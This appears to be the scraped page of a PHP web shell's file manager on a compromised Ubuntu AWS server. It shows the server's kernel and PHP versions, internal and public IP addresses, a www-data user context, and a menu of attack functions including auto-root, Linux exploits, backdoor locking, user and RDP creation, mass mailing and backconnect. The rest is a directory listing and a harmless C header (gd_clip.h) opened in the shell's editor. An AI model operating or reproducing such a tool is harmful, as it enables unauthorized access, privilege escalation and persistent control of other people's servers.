Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.58.166
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
include /
libwmf /
gd /
[ HOME SHELL ]
Name
Size
Permission
Action
gd.h
19.03
KB
-rw-r--r--
gd_clip.h
449
B
-rw-r--r--
gd_io.h
917
B
-rw-r--r--
gdcache.h
2.62
KB
-rw-r--r--
gdfontg.h
490
B
-rw-r--r--
gdfontl.h
488
B
-rw-r--r--
gdfontmb.h
451
B
-rw-r--r--
gdfonts.h
452
B
-rw-r--r--
gdfontt.h
484
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gd_clip.h
#ifndef GD_CLIP_H #define GD_CLIP_H 1 #ifdef __cplusplus extern "C" { #endif /* ClipRectangle type for use as part of ClipSet. */ typedef struct { /* point must lie in range: x_min <= x <= x_max, y_min <= y <= y_max */ int x_min, y_min; int x_max, y_max; } gdClipRectangle, *gdClipRectanglePtr; /* ClipSet type */ typedef struct { int max; int count; gdClipRectangle* list; } gdClipSet; #ifdef __cplusplus } #endif #endif /* GD_CLIP_H */
Close